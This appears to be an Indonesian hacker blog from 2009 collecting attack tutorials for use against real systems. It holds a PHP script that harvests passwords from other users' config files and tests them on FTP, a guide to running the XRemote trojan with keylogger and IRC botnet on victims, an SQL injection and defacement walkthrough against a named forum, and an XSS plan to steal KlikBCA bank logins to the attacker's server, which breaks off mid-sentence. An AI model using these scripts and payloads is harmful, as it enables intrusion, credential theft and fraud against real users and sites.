The Newbie Hacker Blog's

FTP hack buat dapetin cpanel atau yang lainnya

anaksapek — Mon, 16 Nov 2009 08:42:47 +0000

coba deh gunain script ini
script asli dari bl4ck 3ng1n3

Code:

echo “”;
echo “N 4 C K 0 | CYBERDOS TEAM”;

set_time_limit(0);
##################
@$passwd=fopen(‘/etc/passwd’,'r’);
if (!$passwd) {
echo “[-] Error : coudn’t read /etc/passwd”;
exit;
}
$path_to_public=array();
$users=array();
$pathtoconf=array();
$i=0;

while(!feof($passwd)) {
$str=fgets($passwd);
if ($i>35) {
$pos=strpos($str,”:”);
$username=substr($str,0,$pos);
$dirz=”/home/$username/public_html/”;
if (($username!=”")) {
if (is_readable($dirz)) {
array_push($users,$username);
array_push($path_to_public,$dirz);
}
}
}
$i++;
}
###################

#########################
echo “

”;
echo “”; echo “[+] Founded “.sizeof($users).” entrys in /etc/passwd\n”; echo “[+] Founded “.sizeof($path_to_public).” readable public_html directories\n”; echo “[~] Searching for passwords in config.* files…\n\n”; foreach ($users as $user) { $path=”/home/$user/public_html/”; read_dir($path,$user); } echo “\n[+] Done\n”; function read_dir($path,$username) { if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $fpath=”$path$file”; if (($file!=’.') and ($file!=’..’)) { if (is_readable($fpath)) { $dr=”$fpath/”; if (is_dir($dr)) { read_dir($dr,$username); } else { if (($file==’config.php’) or ($file==’config.inc.php’) or ($file==’db.inc.php’) or ($file==’connect.php’) or ($file==’wp-config.php’) or ($file==’var.php’) or ($file==’configure.php’) or ($file==’db.php’) or ($file==’configuration.php’) or ($file==’db_connect.php’)) { $pass=get_pass($fpath); if ($pass!=”) { echo “[+] $fpath\n$pass\n”; ftp_check($username,$pass); } } } } } } } } function get_pass($link) { @$config=fopen($link,’r'); while(!feof($config)) { $line=fgets($config); if (strstr($line,’pass’) or strstr($line,’password’) or strstr($line,’passwd’)) { if (strrpos($line,’”‘)) $pass=substr($line,(strpos($line,’=')+3),(strrpos($line,’”‘)-(strpos($line,’=')+3))); else $pass=substr($line,(strpos($line,’=')+3),(strrpos($line,”‘”)-(strpos($line,’=')+3))); return $pass; } } } function ftp_check($login,$pass) { @$ftp=ftp_connect(’127.0.0.1′); if ($ftp) { @$res=ftp_login($ftp,$login,$pass); if ($res) { echo ‘[FTP] ‘.$login.’:’.$pass.” Success\n”; } else ftp_quit($ftp); } } echo “
”;

echo “”;
?>

source : http://forum.hackers-center.org/viewtopic.php?f=3&t=2726

Xtreme Remote

anaksapek — Mon, 16 Nov 2009 08:39:36 +0000

enter][/center]

download File

1.Instalasi
XRemote terdiri dari dua bagian, yaitu : XRemote.exe (Pengontrol) dan IEXPLORER.exe (Trojan). XRemote adalah bagian yang harus anda jalankan di komputer anda sedangkan IEXPLORER.exe adalah bagian yang harus anda jalankan di komputer target.

Instalasi XRemote.exe

* Ekstrak semua file Client.zip ke directory komputer anda sesuai keinginan. Jalankan XRemote.exe

Instalasi IEXPLORER.exe

* Ekstrak semua file Server.zip ke directory komputer target sesuai keinginan. Jalankan IEXPLORER.exe.
* Server ini tidak terlihat di monitor komputer korban.
* Catatan: Komputer pengontrol dan komputer target terhubung di dalam LAN (Local
* Area Network) yang sama ataupun didalam satu kesatuan sistem jaringan yang sama.

2.Koneksi ke komputer target

lik Show Commands dan anda akan melihat tampilan penuh dari XRemote. Anda perlu melakukan koneksi ke komputer korban (Saya anggap anda sudah menginstalasikan trojan ke komputer korban sudah menjalankan trojan tersebut).

Didalam sebuah Jaringan seperti LAN atau Wireless LAN memiliki beberapa komputer client dengan alamat IP yang berbeda. Alamat IP didalam sebuah jaringan umumnya adalah 192.168.0.XX atau 10.10.10.XX. Jika anda tidak mengetahui secara pasti alamat IP korban, scan terlebih dahulu di menu Xremote Server Scanner. Klik Start dan lihat daftar komputer aktif yang telah terinfeksi oleh trojan Scanner akan menunjukkan komputer dengan alamat IP yang telah terinfeksi oleh server XRemote. Isi alamat IP korban dan klik connect untuk dapat mengontrol komputer target dari komputer anda. Jika komputer anda telah konek ke komputer target, maka anda akan melihat kata “connected” di kolom status.

3. FUNGSI DAN OPSI REMOTER
3.1 Ghost Remote

Berikut dibawah ini adalah fungsi yang dapat
dikontrol pada komputer korban.
- Open CD-ROM – CLOSE CD-ROM
Buka CD-ROM – Tutup CD-ROM
- Hide Taskbar – Show Taskbar
Sembunyikan Taskbar – Kembalikan Taskbar yang hilang
- Ram Nuker – Stop Ram Nuker
Menghabiskan resource memory RAM – menghentikan fungsi RAM nuker
- Lock The Mouse – Free The Mouse
Mengunci fungsi mouse – menghentikan penguncian mouse
- Disable Click – Enable Click
Mematikan fungsi klik pada mouse – mengembalikan fungsi klik pada mouse
- Shutdown PC – Reboot PC
Matikan komputer korban – Reboot komputer korban
- Disable Cpanel – Enable Cpanel
Melarang fungsi Control Panel – Mengembalikan Fungsi Control Panel
- Disable Run Menu – Enable Run Menu
Melarang fungsi RUN – Mengembalikan Fungsi RUN
- Disable Find Menu – Enable Find Menu
Melarang fungsi FIND – Mengembalikan Fungsi FIND – Ghost Message – Close Message
Menampilkan Peringatan ke komputer korban bahwa dia telah di-Remote – menutup pesan Ghost Message
- Disable Regedit – Enable Regedit
Melarang fungsi REGEDIT – Mengembalikan fungsi REGEDIT
- Disable TaskMan – Enable TaskMan
Melarang fungsi Task Manager – Mengembalikan fungsi Task Manager
- Scr Injection – BlackEnd
Menginjeksi kalimat screen saver 3Dtext dan marquee – Menghitamkan menuWindows

3.2 Injection / Remote Execution

Injection / Remote Execution adalah menu yang menyertakan fungsi untuk memasukkan file, menjalankan program , membuat registry string dan mematikan proses pada komputer korban.

Menyusupkan file ke komputer korban
Setelah anda berhasil melakukan koneksi ke komputer korban, anda dapat
mengirimkan file secara diam-diam ke komputer target. Pilih dahulu file yang terdapat di komputer anda (YOUR DRIVE) dan tentukan lokasi di komputer korban (REMOTE EXECUTION – PATH:\MYFILE.EXE) . Cth : C:\filesaya.exe .lalu klik SEND Maka anda telah mengirimkan file filesaya.exe ke komputer korban dimana lokasi virus.exe terdapat di C:\ .

Autorun file hasil susupan di komputer korban
Setelah anda tadi telah menyusupkan filesaya.exe , anda kemudian bisa menentukan apakah filesaya.exe nantinya akan dijalankan setiap kali komputer korban startup. Klik AUTORUN jika anda menginginkan filesaya.exe aktif setiap kali komputer korban dihidupkan.

Menjalankan program di komputer korban
Anda bisa menjalankan program/file music, file gambar, file text di komputer korban. Isi secara lengkap PATH:\REMOTEFILE.EXE . Cth : C:\filesaya.exe dan klik RUN ,maka filesaya.exe akan dieksekusi di komputer korban. Jika anda ingin menjalankan winamp secara remote pada komputer korban, isi kolom menjadi C:\programfiles\winamp\winamp.exe .

Mematikan proses di komputer korban
Anda juga dapat mematikan proses di komputer korban. Isi nama proses yang akan dimatikan di kolom REMOTEFILE.EXE lalu klik KILL misalnya, komputer korban sedang menjalankan Microsoft Word dan anda ingin menutupnya secara remote dari komputer anda. Isi dengan WINWORD.exe dan eksekusikan perintah KILL.

Membuat komputer korban membacakan teks yang anda kirimkan
Membuat komputer korban berbicara sesuka hati anda merupakan salah satu fungsi tambahan yang dimiliki oleh XRemote. Cukup ketikkan kata-kata di kolom dan klik tombol GODSPEAK. Maka komputer korban akan menjadi sebuah mesin yang cerewet.

3.3 Keylogger

Seperti namanya, Key = kunci (tombol yang dapat anda ketik di keyboard) dan logger = pencatat/perekam. Keylogger dapat diartikan “Kemampuan sebuah program untuk merekam setiap aktifitas yang dilakukan user diatas keyboard”.
Ketika server trojan XRemote aktif, fungsi keylogger tidak difungsikan pada komoyter korban. Anda dapat mengaktifkan ataupun mematikan keylogger sesuai kehendak.
Klik : START KEYLOGGER dan biarkan korban beraktifitas beberapa saat. Jika anda ingin melihat apa yang telah diketik oleh korban Klik GET LOG FILE, maka trojan akan mengirimkan catatan keylogger ke komputer anda. Klik CLEAR untuk membersihkan log file dan STOP KEYLOGGER untuk menonaktifkan fungsi keylogger.

Aktifitas yang akan dicatat oleh Trojan adalah sebagai berikut :
- Aplikasi yang dijalankan korban
- Karakter yang diketik dengan keyboard oleh korban
3.4. IRC Botnet

IRC botnet adalah fungsi untuk mengendalikan komputer korban melalui server IRC .
Fungsi ini bersifat massal, artinya anda tidak hanya dapat mengendalikan sebuah komputer saja. Anda dapat mengendalikan seluruh korban trojan XRemote di dalam channel IRC.
Untuk dapat menjalankan fungsi ini, tentunya syarat mutlak adalah anda dan korban harus dalam keadaan terkoneksi ke internet. Klik BOTNET ON untuk mengaktifkan Botnet di komputer korban. Anda juga harus konek ke irc server, isi nick anda di kolom sesuai keinginan dan Klik CONNECT . Baik anda maupun korban akan masuk ke #H.A.C.K irc.dal.net.

Fungsi Command :
!IDENT = memerintahkan Botnet untuk mengidentifikasi diri
!CLEAR = menghapus log file Botnet
!SPAM = memerintahkan Botnet untuk masuk ke channel-channel besar dan melakukan spam
!NOSPAM = memerintahkan Botnet untuk keluar dari ke channel-channel besar.
!CNICK = memerintahkan Botnet untuk menganti nick
!MAINROOM = memerintahkan Botnet untuk join ke channel afiliasi

credit : Indonesia Hacker

source : http://forum.hackers-center.org/viewtopic.php?f=3&t=3263

Deface FOrum buat pemula [exploit]

anaksapek — Mon, 16 Nov 2009 08:30:40 +0000

nih tutorial asal nya aku download video deface dr temen, trus di file itu ad tutor nya, yaudah ku copast aja kesini

langsung ya

Ketik di google
inurl:/forums.asp?iFor=

Pilih target…
Contoh target
http://www.portugalweb.net/forum/forums.asp?iFor=23

Hapus angka dibelakang =
Hingga menjadi ini
http://www.portugalweb.net/forum/forums.asp?iFor=

Setelah = masukan SQL inject
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users

Hingga menjadi seperti ini
http://www.portugalweb.net/forum/forums … from+users

Tulisan yg berderet di bawah nama 10 TOPICS itu adalah username
Tulisan yg berderet di bawah nama DATED itu adalah passwordnya

Cari username admin & passnya.
Ok..pada web target yg jadi bahan tutor ini saya menemukan username & password
Username : admin
Password : default

Sekarang klik tulisan login yg berada diatas.
Nah..login udah berhasil
Sekarang jika ingin melakukan defacing, klik tulisan “POST NEW TOPICS”

Isi Subject nya…
Contoh : HACKED BY BLA BLA BLA
lalu masukin script deface HTML nya ke kolom di bawah subject.

Hmm……
Jika ingin menutup full seluruh halaman, pake code berikut

Attacked by : Ichito-Bandito

FUCK Malaysial and ASSOCIATE

We Are Ready to Cybernetic Wars

Hackers-center In Here

kalo mau di tambah lagu juga bisa:
: [/color]

Jangan lupa di edit dulu kataÂ² nya !!!

Trus klik tombol post….
Ok…HTML deface an lo udah masuk…sekarang klik judul postingan yg lo tulis di subject tadi.

source : http://forum.hackers-center.org/viewtopic.php?f=3&t=3255

Security KlikBCA – Recover Password With XSS

anaksapek — Mon, 16 Nov 2009 08:21:49 +0000

Sudah baca majalah Underground Info ? Di majalah itu ada artikel yang ditulis oleh S’to tentang XSS di halaman login klikbca.com. Dalam tulisan ini saya bahas lebih jauh lagi dan saya berikan contoh exploit yang cukup berbahaya dari vulnerability yang ditemukan S’to di majalah tersebut.
Maaf artikel ini bukan XSS basics, tentang apa itu XSS nanti saya akan bahas di artikel khusus.

Sebenarnya XSS termasuk bug yang gawat dan susah diantisipasi, namun XSS juga bug yang paling sering diremehkan. Karena berbeda dengan bug lain seperti SQL Injection yang menyerang server, bug ini tidak berpengaruh sama sekali terhadap server. XSS hanya menyerang client, yaitu pengguna web application.

Mungkin mereka berpikir apa sih hal terburuk yang bisa menimpa server dengan XSS? Memang tidak secara langsung, namun ingat satu bug bisa di-exploit dengan 1001 macam cara yang semakin lama semakin efektif. Anda akan terkejut menyadari bahwa bug “seremeh” ini ternyata bisa diexploit sedemikian rupa.

The Vulnerability

Bug XSS ini akan muncul bila kita memasukkan username dan password yang salah. Ketika kita salah mengisi password, maka akan muncul dialog box yang memberitahu bahwa password kita salah.

URL ketika password kita salah adalah:

Code:

https://ibank.klikbca.com/authentication.do?value(actions)=logout&value(strError)=Mohon masukkan User ID/Password Anda yg benar \n (Please enter Your correct User ID/Password)

URL tersebut akan menghasilkan source html sebagai berikut:

Code:

Perhatikan bahwa setelah var err ditutup dengan karakter kutip (’). Jadi kalau kita ingin meng-injeksikan tag html atau javascript lain, kita harus tutup dulu dengan karakter (’). Mari kita coba untuk menampilkan dialog box berisi cookie dengan URL berikut:

Code:

https://ibank.klikbca.com/authentication.do?value(actions)=logout&value(strError)=TEST‘;alert(document.cookie);
URL di atas menghasilkan source html berikut:

Code:

Proses injeksi tersebut bisa dijelaskan dalam gambar berikut ini

Oke saya rasa cukup main-mainnya, saya tidak terlalu suka cookie, saya ingin lebih dari itu, saya ingin username dan password.

Strategy and Tactics
Strategi yang saya pakai untuk mendapatkan username dan password sangatlah sederhana, yaitu dengan mengirimkan password dan username pada saat user meng-klik tombol submit. Untuk bisa menjalankan strategi itu saya menggunakan taktik berikut:

1. Meng-intercept klik tombol submit
2. Mengirimkan user dan password ke server saya
3. Mencatat user dan password di server saya

Intercepting Submit Button
Saya menemukan kendala dalam mengintercept submit button. Kalau kita lihat pada source htmlnya button submit, kita akan temukan bahwa event onclick sudah di-hook untuk fungsi Login_Form_Validator. Setelah saya coba-coba, saya tidak bisa mengubah onclick itu ke fungsi lain.

Code:

1. 2. onclick=“javascript:return Login_Form_Validator(document.frmParam)”
3. onmouseover=“this.style.cursor=’hand’” />

Fungsi Login_Form_Validator digunakan untuk melakukan validasi awal apakah kita mengisi user dan password sesuai format yang benar.

Code:

var blnSubmitted = false;
function Login_Form_Validator( theForm ) {

document.forms[0]['value(user_id)'].autocomplete = ‘off’;
document.forms[0]['value(pswd)'].autocomplete = ‘off’;

var blnResponse = false;
if (blnSubmitted) {
return false;
}

var strErrMsg = “”;
if( document.forms[0]['value(user_id)'].value == ”) {
alert(“Silakan mengisi User ID anda/Please input your User ID”);
document.forms[0]['value(user_id)'].focus();
return false;
}
if( document.forms[0]['value(user_id)'].value.length>12) {
alert(“User ID/Password Anda salah / Your User ID/Password is Wrong”);
document.forms[0]['value(user_id)'].select();
document.forms[0]['value(user_id)'].focus();
return false;
}

if(document.forms[0]['value(pswd)'].value == ”) {
alert(“Silakan mengisi PIN anda/Please input your PIN”);
document.forms[0]['value(pswd)'].focus();
return false;
}
if(document.forms[0]['value(pswd)'].value.length<6) {
alert(“PIN harus 6 Angka/PIN must be 6 digits”);
document.forms[0]['value(pswd)'].focus();
return false;
}

//if(strErrMsg != ”) {
// alert(strErrMsg);
// return false;
//}

//blnSubmitted = confirm(”Click OK to login.”);
if ( !blnSubmitted ) {
blnSubmitted = true;
blnResponse = true;
}

//if(’< %= blnLogout %>’==’true’)
//blnResponse = false;

return blnResponse;
}

Saya berpikir, bila mengubah onclick button ke fungsi lain tidak bisa, berarti kita harus menimpa fungsi Login_Form_Validator dengan fungsi kita sendiri. Biarkan event onclick button submit mengarah pada Login_Form_Validator, namun fungsi tersebut sudah kita ubah dengan code kita sendiri. Dengan kata lain kita define fungsi dengan nama yang sama, namun isi yang berbeda. Apakah itu akan menimbulkan dualisme fungsi? Iya tentu saja, karena satu fungsi yang sama tidak boleh di-definisikan dua kali.

Setelah saya perhatikan source htmlnya, ternyata saya diuntungkan dengan posisi fungsi Login_Form_Validator yang berada di baris paling bawah. Jadi yang saya lakukan adalah saya definisikan fungsi dengan nama Login_Form_Validator, dan kemudian saya buat browser untuk mengabaikan semua javascript di baris selanjutnya. Dengan cara ini fungsi Login_Form_Validator yang dikenal browser adalah Login_Form_Validator versi saya. Untuk itu saya tambahkan tag